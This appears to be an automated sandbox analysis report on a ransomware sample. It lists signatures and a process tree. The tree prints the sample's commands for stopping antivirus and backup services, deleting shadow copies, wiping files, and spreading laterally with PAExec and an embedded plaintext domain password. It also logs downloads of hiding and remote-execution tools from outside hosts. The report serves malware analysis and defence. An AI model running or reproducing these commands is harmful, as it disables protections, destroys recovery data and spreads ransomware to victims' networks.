Resubmissions

30-06-2024 11:05

240630-m6ssqawhkc 10

30-06-2024 11:04

240630-m6hmrazejm 10

29-06-2024 20:11

240629-yybd9avdrf 10

Analysis

  • max time kernel
    93s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-06-2024 11:04

General

  • Target

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

  • Size

    87KB

  • MD5

    d6d956267a268c9dcf48445629d2803e

  • SHA1

    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

  • SHA256

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

  • SHA512

    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

  • SSDEEP

    1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (53) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
    "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Drops startup file
    • Windows security modification
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4532
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop avpsus /y
      2⤵
      PID:2660
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
        PID:1004
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      2⤵
      PID:2496
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        3⤵
        PID:3684
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop mfewc /y
      2⤵
      PID:916
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfewc /y
        3⤵
        PID:1856
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BMR Boot Service /y
      2⤵
      PID:4576
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BMR Boot Service /y
        3⤵
        PID:2856
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop NetBackup BMR MTFTP Service /y
      2⤵
      PID:2180
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
        3⤵
        PID:3112
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop DefWatch /y
      2⤵
      PID:3308
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop DefWatch /y
        3⤵
        PID:5420
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop ccEvtMgr /y
      2⤵
      PID:1424
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccEvtMgr /y
        3⤵
        PID:5432
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop ccSetMgr /y
      2⤵
      PID:1840
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccSetMgr /y
        3⤵
        PID:5276
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop SavRoam /y
      2⤵
      PID:4528
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SavRoam /y
        3⤵
        PID:5168
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop RTVscan /y
      2⤵
      PID:4524
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop RTVscan /y
        3⤵
        PID:5176
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop QBFCService /y
      2⤵
      PID:224
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBFCService /y
        3⤵
        PID:5316
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop QBIDPService /y
      2⤵
      PID:232
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBIDPService /y
        3⤵
        PID:5352
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop Intuit.QuickBooks.FCS /y
      2⤵
      PID:4932
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
        3⤵
        PID:648
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop QBCFMonitorService /y
      2⤵
      PID:4984
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBCFMonitorService /y
        3⤵
        PID:5328
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop YooBackup /y
      2⤵
      PID:3704
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooBackup /y
        3⤵
        PID:5576
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop YooIT /y
      2⤵
      PID:4000
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooIT /y
        3⤵
        PID:5732
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop zhudongfangyu /y
      2⤵
      PID:4392
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop zhudongfangyu /y
        3⤵
        PID:5528
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop stc_raw_agent /y
      2⤵
      PID:3360
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop stc_raw_agent /y
        3⤵
        PID:5412
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop VSNAPVSS /y
      2⤵
      PID:3824
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VSNAPVSS /y
        3⤵
        PID:5564
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop VeeamTransportSvc /y
      2⤵
      PID:2500
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        3⤵
        PID:5612
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop VeeamDeploymentService /y
      2⤵
      PID:2552
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        3⤵
        PID:5336
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop VeeamNFSSvc /y
      2⤵
      PID:388
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        3⤵
        PID:5160
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop veeam /y
      2⤵
      PID:4228
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop veeam /y
        3⤵
        PID:5544
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop PDVFSService /y
      2⤵
      PID:4384
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        3⤵
        PID:5688
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      2⤵
      PID:1720
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        3⤵
        PID:5496
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      2⤵
      PID:2096
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        3⤵
        PID:5668
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      2⤵
      PID:2704
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        3⤵
        PID:5556
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecDiveciMediaService /y
      2⤵
      PID:1776
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
        3⤵
        PID:5640
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecJobEngine /y
      2⤵
      PID:2192
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        3⤵
        PID:5676
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecManagementService /y
      2⤵
      PID:5096
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        3⤵
        PID:5752
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop BackupExecRPCService /y
      2⤵
      PID:4616
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        3⤵
        PID:5648
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop AcrSch2Svc /y
      2⤵
      PID:3408
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        3⤵
        PID:5624
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop AcronisAgent /y
      2⤵
      PID:924
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        3⤵
        PID:5708
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop CASAD2DWebSvc /y
      2⤵
      PID:1032
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
        3⤵
        PID:5656
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop CAARCUpdateSvc /y
      2⤵
      PID:744
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CAARCUpdateSvc /y
        3⤵
        PID:5380
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop sophos /y
      2⤵
      PID:1748
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sophos /y
        3⤵
        PID:5632
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
      • Launches sc.exe
      PID:1100
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      2⤵
      • Launches sc.exe
      PID:1156
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4688
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SstpSvc start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4176
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2468
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1716
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2508
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3240
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4416
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4544
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:872
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4896
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3744
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2556
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3640
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2092
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4412
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:972
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1904
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1484
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4044
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2340
                                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                        "net.exe" use \\10.127.1.17 /USER:SHJPOLICE\amer !Omar2012
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2228
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jv2uowbm.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jv2uowbm.exe" \10.127.1.17 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:5696
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5176
                                                                                                                                                          • C:\Windows\SYSTEM32\arp.exe
                                                                                                                                                            "arp" -a
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2956
                                                                                                                                                            • C:\Windows\System32\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                                                              2⤵
                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                              PID:5892
                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                              "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5280
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5276
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping 127.0.0.7 -n 3
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:5568
                                                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                                                    fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5148
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5664
                                                                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5040
                                                                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe 692cdefe6a31d5f30fa313ea55acb130 0dFin8KRqEqhT0NjofFp3Q.0.1.0.0.0
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4896
                                                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:224

Network

• DNS
  raw.githubusercontent.com
  Process: c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
  Remote address: 8.8.8.8:53
  Request
  raw.githubusercontent.com IN A
  Response
  raw.githubusercontent.com IN A 185.199.109.133
  raw.githubusercontent.com IN A 185.199.108.133
  raw.githubusercontent.com IN A 185.199.111.133
  raw.githubusercontent.com
                                                                                                                                                                          IN A
                                                                                                                                                                          185.199.110.133
                                                                                                                                                                        • flag-us
                                                                                                                                                                          GET
                                                                                                                                                                          https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          185.199.109.133:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET /d35ha/ProcessHide/master/bins/ProcessHide64.exe HTTP/1.1
                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Content-Length: 141478
                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          ETag: "3bc3d78bc68a5b7b2573b11d0715f13a64eb42781d6a05c2f3015bf90df87dbc"
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                          X-GitHub-Request-Id: DDF0:34BFB4:F6A28:1448E7:66813BCA
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:43 GMT
                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                          X-Served-By: cache-lcy-eglc8600046-LCY
                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                          X-Timer: S1719745483.932825,VS0,VE136
                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                          X-Fastly-Request-ID: 4d46a33b5975fea5a26d36657f859f2ad4dade3c
                                                                                                                                                                          Expires: Sun, 30 Jun 2024 11:09:43 GMT
                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          cdn-185-199-109-133githubcom
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          www.google.com
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          www.google.com
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          www.google.com
                                                                                                                                                                          IN A
                                                                                                                                                                          142.250.187.196
                                                                                                                                                                        • flag-gb
                                                                                                                                                                          GET
                                                                                                                                                                          https://www.google.com/
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          142.250.187.196:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET / HTTP/1.1
                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:43 GMT
                                                                                                                                                                          Expires: -1
                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                          Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-OV835FREtRAyNmFk_sWfuQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                          Server: gws
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          Set-Cookie: AEC=AQTF6HyGEfBGfLwHC3Z_-OKhAI-lxj6MxgjRj9Eh3zjXmnIpg0wPww_tKlE; expires=Fri, 27-Dec-2024 11:04:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                          Set-Cookie: __Secure-ENID=20.SE=EfexZMPWr43Lx24QA04vdlTjjt-D_rPOkeJPFmtOZqHxnsvQchT4WqE_WlNz1eIsbNvl8fAiI0rgdwIpARG61bu6JJixIJo3lLyTbRCyA6OsIKqSYf5scx5JV5nzANUhcnSDR_y0Cdo7al3QAJx0aF4xo-moRiQeKFj6Fs1ozlxyLg8hDJYl; expires=Thu, 31-Jul-2025 03:23:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          www.poweradmin.com
                                                                                                                                                                          IN CNAME
                                                                                                                                                                          poweradmin.com
                                                                                                                                                                          poweradmin.com
                                                                                                                                                                          IN A
                                                                                                                                                                          52.1.55.52
                                                                                                                                                                        • flag-us
                                                                                                                                                                          GET
                                                                                                                                                                          https://www.poweradmin.com/paexec/paexec.exe
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          52.1.55.52:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET /paexec/paexec.exe HTTP/1.1
                                                                                                                                                                          Host: www.poweradmin.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Last-Modified: Thu, 15 Apr 2021 21:21:55 GMT
                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                          X-AspNet-Version: 4.0.30319
                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                          Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: *.typekit.net *.poweradmin.com *.visualwebsiteoptimizer.com *.sitesearch360.com *.google.com *.googleadservices.com *.google-analytics.com *.googleusercontent.com *.googletagmanager.com *.googleapis.com *.gstatic.com *.doubleclick.net *.livechatinc.com *.authorize.net *.reddit.com *.redditstatic.com *.youtube.com *.capterra.com *.bing.com; frame-ancestors 'self' *.poweradmin.com *.authorize.net;
                                                                                                                                                                          X-Xss-Protection: 1;
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:44 GMT
                                                                                                                                                                          Content-Length: 224560
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          13.86.106.20.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          13.86.106.20.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
196.187.250.142.in-addr.arpa
Remote address: 8.8.8.8:53
Request
196.187.250.142.in-addr.arpa IN PTR
Response
196.187.250.142.in-addr.arpa IN PTR lhr25s33-in-f4.1e100.net
• flag-us
DNS 52.55.1.52.in-addr.arpa
Remote address: 8.8.8.8:53
Request
52.55.1.52.in-addr.arpa IN PTR
Response
52.55.1.52.in-addr.arpa IN PTR ec2-52-1-55-52.compute-1.amazonaws.com
• flag-us
DNS 240.221.184.93.in-addr.arpa
Remote address: 8.8.8.8:53
Request
240.221.184.93.in-addr.arpa IN PTR
Response
• flag-us
